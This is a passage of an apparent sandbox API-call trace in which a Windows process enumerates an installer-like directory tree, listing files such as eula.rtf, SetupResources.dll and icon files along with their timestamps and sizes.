ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.144] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.144] FindClose (in: hFindFile=0x801f58 | out: hFindFile=0x801f58) returned 1 [0169.144] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.144] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0169.144] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.144] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802658 [0169.145] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.145] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.145] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.145] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.145] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.145] FindClose (in: hFindFile=0x802658 | out: hFindFile=0x802658) returned 1 [0169.145] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.145] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0169.146] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.146] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802458 [0169.208] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.208] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.208] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.208] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.208] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.209] FindClose (in: hFindFile=0x802458 | out: hFindFile=0x802458) returned 1 [0169.209] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.209] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0169.209] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.209] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802018 [0169.210] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.210] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0169.210] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0169.210] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0169.210] FindClose (in: hFindFile=0x802018 | out: hFindFile=0x802018) returned 1 [0169.210] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.210] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0169.211] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0169.211] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Extended", cAlternateFileName="")) returned 1 [0169.211] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.211] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802158 [0169.211] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.211] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0169.212] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0169.212] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0169.212] FindClose (in: hFindFile=0x802158 | out: hFindFile=0x802158) returned 1 [0169.212] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.212] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0169.212] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.212] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802458 [0169.264] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.265] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0169.265] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0169.265] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0169.265] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0169.265] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0169.265] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0169.265] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0169.266] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0169.266] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0169.266] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0169.266] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0169.266] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, 